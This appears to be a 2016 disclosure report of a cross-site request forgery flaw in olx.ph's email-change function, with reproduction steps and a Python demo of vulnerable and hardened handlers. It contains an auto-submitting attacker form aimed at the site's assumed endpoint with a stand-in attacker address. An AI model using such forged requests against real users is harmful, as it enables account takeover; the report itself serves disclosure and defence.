Wednesday, September 28, 2016

Cross-Site Request Forgery change Email in https://www.olx.ph

Hi there,
While testing http://www.olx.ph I came across a CSRF vulnerability in the account settings menu: the request that changes the account's email address can be forged from a page on another site, because nothing in it ties the request to the logged-in user's session beyond the cookies the browser attaches automatically.

Reproduction Steps :

1. Choose a victim who is currently logged in to an olx.ph account.
2. The attacker prepares a page containing the change-email request (a form pointing at the email-change endpoint with the attacker's address as the new value, submitted automatically when the page loads) and sends the victim a link to it.
3. When the victim opens the link, the browser sends the request together with the victim's olx.ph session cookies, and the account email is changed without any further confirmation from the victim.
4. The attacker then completes the verification step using his own mailbox, since the confirmation mail is sent to the new address.
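The steps above describe the classic pattern: the server accepts the state-changing request on the strength of the session cookie alone. The following is an added example, not OLX's code, that simulates the email-change handler in both its vulnerable and a hardened form (synchroniser token plus Origin/Referer check) and shows the forged request succeeding against the first and failing against the second. The endpoint path `/account/change-email`, the field names, the session store and the attacker page are all assumptions made for illustration; the report does not give them.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed origin of the site under test; the report only names the host.
SITE_ORIGIN = "https://www.olx.ph"

# Constructed in-memory session store: cookie value -> account record.
SESSIONS = {}


def new_session(user, email):
    """Log a user in and return the session cookie value (constructed helper)."""
    cookie = "sess_" + secrets.token_hex(8)
    SESSIONS[cookie] = {"user": user, "email": email, "csrf": secrets.token_hex(16)}
    return cookie


def current_email(cookie):
    return SESSIONS[cookie]["email"]


def _origin_of(url):
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}"


def change_email_vulnerable(request):
    """Vulnerable handler: the session cookie is the only thing checked.

    A cross-site POST carries that cookie automatically, so the browser performs
    the change on the victim's behalf.  This mirrors the behaviour the report describes."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    session["email"] = request["form"]["email"]
    return 200, "email updated"


def change_email_hardened(request):
    """Hardened handler: per-session CSRF token plus an Origin/Referer check."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    # 1. The request must originate from our own site.  Origin is preferred;
    #    Referer is accepted as a fallback; neither present means reject.
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin is None or _origin_of(origin) != SITE_ORIGIN:
        return 403, "cross-site request rejected"
    # 2. The form must carry the token issued to this session; compare in
    #    constant time so the check does not leak the token byte by byte.
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf"]):
        return 403, "missing or invalid CSRF token"
    session["email"] = request["form"]["email"]
    return 200, "email updated"


# Assumed attacker page: an auto-submitting form.  Cookies for www.olx.ph are
# attached by the browser; the attacker never needs to read them.
ATTACKER_PAGE = """
<form id="f" method="POST" action="https://www.olx.ph/account/change-email">
  <input type="hidden" name="email" value="attacker@attacker.example">
</form>
<script>document.getElementById("f").submit();</script>
"""


def forged_request(session_cookie, new_email):
    """What the server receives when the victim opens ATTACKER_PAGE:
    victim's cookie, attacker's Origin, no CSRF token."""
    return {
        "cookies": {"session": session_cookie},
        "headers": {"Origin": "https://attacker.example"},
        "form": {"email": new_email},
    }


def legitimate_request(session_cookie, new_email):
    """A request from the site's own settings page, token included."""
    return {
        "cookies": {"session": session_cookie},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"email": new_email, "csrf_token": SESSIONS[session_cookie]["csrf"]},
    }


if __name__ == "__main__":
    c = new_session("victim", "victim@example.com")
    print(change_email_vulnerable(forged_request(c, "attacker@attacker.example")), current_email(c))
    c = new_session("victim", "victim@example.com")
    print(change_email_hardened(forged_request(c, "attacker@attacker.example")), current_email(c))
    print(change_email_hardened(legitimate_request(c, "new@example.com")), current_email(c))
```

The Origin check alone is not enough (older clients and some proxies strip the header, and a missing header has to be treated as a rejection), and the token alone leaves the forged request one leaked token away from working, so both checks are applied. For an email change in particular, a hardened site would additionally require the current password or a confirmation sent to the old address before the new one takes effect.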

Exploitability :

Once an attacker knows about this vulnerability it affects every logged-in user, not just one victim: the same malicious page can be sent to any number of users, and each one who opens it while logged in has the email on the account replaced with the attacker's. Since the attacker then controls the address the account is tied to (and verifies it from his own mailbox), the attacker can take over the account.

Impact :

Full account takeover by the attacker, without knowing the victim's password: a single click on a link while logged in is enough.